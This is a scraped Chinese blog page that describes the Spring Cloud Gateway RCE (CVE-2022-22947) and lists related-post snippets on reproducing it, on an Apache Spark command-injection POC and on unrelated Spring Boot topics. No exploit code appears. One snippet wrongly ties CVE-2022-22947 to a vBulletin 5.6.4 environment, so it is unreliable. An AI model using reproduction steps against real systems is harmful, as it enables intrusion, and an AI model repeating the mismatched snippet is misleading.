Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。(二)漏洞复现
CVE漏洞复现-CVE-2022-22947-Spring Cloud Gateway RCE
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-10 1768
最开始时,我们开发java项目时,所有的代码都在一个工程里,我们把它称为单体架构。当我们的项目的代码量越来越大时,开发的成员越来越多时,这时我们项目的性能以及我们开发的效率都会存在非常大的问题,所以对于这样的项目,我们需要把它拆分为不同的服务,举个列子,原来很大的一个工程,我们把它拆分为一个个服务,比如说订单服务、用户服务、商品服务、物流服务、资金服务等等,因为有了这些服务之后,我们又引入了服务网关、服务注册发现、配置中心、调用链监控、Metrices监控等等的这些组件对这些服务进行协调和管理。
Spring Cloud Gateway RCE漏洞原理分析与复现CVE-2022-22947
日常技术分享
10-16 4484
Spring Cloud Gateway RCE漏洞原理分析与复现CVE-2022-22947
CVE-2022-22947-Spring-Cloud-Gateway 内存POC
03-29
Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
Apache Spark 命令注入(CVE-2022-33891)漏洞复现 CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复...
Spring Boot中的分页与排序实现
java666668888的博客
06-27 268
大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!在开发Web应用时,分页和排序是常见的功能需求,特别是在处理大量数据时。Spring Boot作为当前最流行的Java Web开发框架之一,为我们提供了便捷的分页和排序实现方式。接下来,在Service层中调用Repository层的分页方法,并传入相应的。注意,由于页码是从0开始的,所以我们在传入页码时进行了减1操作。在上面的示例中,我们定义了一个。在上面的示例中,我们定义了一个。
Spring Boot中的应用配置文件管理
最新发布
java666668888的博客
06-27 300
在现代的软件开发中,应用程序的配置管理至关重要。Spring Boot通过其灵活而强大的配置文件机制,为开发人员提供了多种选择,以便于管理应用程序的配置信息。配置文件的灵活性和优先级使得我们可以根据不同的环境需求来配置我们的应用程序,从而简化了部署和维护的复杂性。在Spring Boot中,应用的配置信息通常存储在不同的配置文件中,这些文件可以通过不同的profile(如开发、测试、生产环境)来管理。让我们通过一个简单的示例来演示如何使用Spring Boot的配置文件来管理应用程序的配置信息。
Spring Boot中的依赖注入详解
weixin_44626980的博客
06-27 314
依赖注入是一种设计模式,用于实现对象之间的松耦合关系。在Spring Boot中,依赖注入允许我们将对象的依赖关系通过外部配置或者注解来管理,而不是在对象内部硬编码。通过本文,我们深入了解了Spring Boot中依赖注入的原理、实现方式和最佳实践。正确使用依赖注入可以使我们的代码更加模块化、可测试和可维护。
如何在Spring Boot中优雅处理异常
weixin_44626980的博客
06-26 492
可以创建自定义的异常类来表示特定的业务异常,并在需要时抛出。
如何使用Spring Boot Profiles进行环境配置管理
weixin_44626980的博客
06-26 550
Spring Boot的Profile是一种机制,用于根据当前激活的Profile加载对应的配置文件或配置项。通过Profiles,可以实现配置的灵活切换,无需修改代码即可适配不同的部署环境。
vulhub复现CVE-2022-22947
10-13
复现CVE-2022-22947漏洞,需要先在vulhub上搭建一个运行着vBulletin 5.6.4版本的环境。然后,通过发送特制的HTTP请求,即可触发漏洞,导致远程代码执行。 具体步骤如下: 1. 在vulhub上下载并启动vBulletin 5.6.4环境。 2. 使用工具生成特制的HTTP请求,其中包含恶意代码。 3. 将HTTP请求发送给vBulletin服务器,即可触发漏洞。 4. 漏洞触发后,攻击者可以在服务器上执行任意代码,获取敏感信息等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值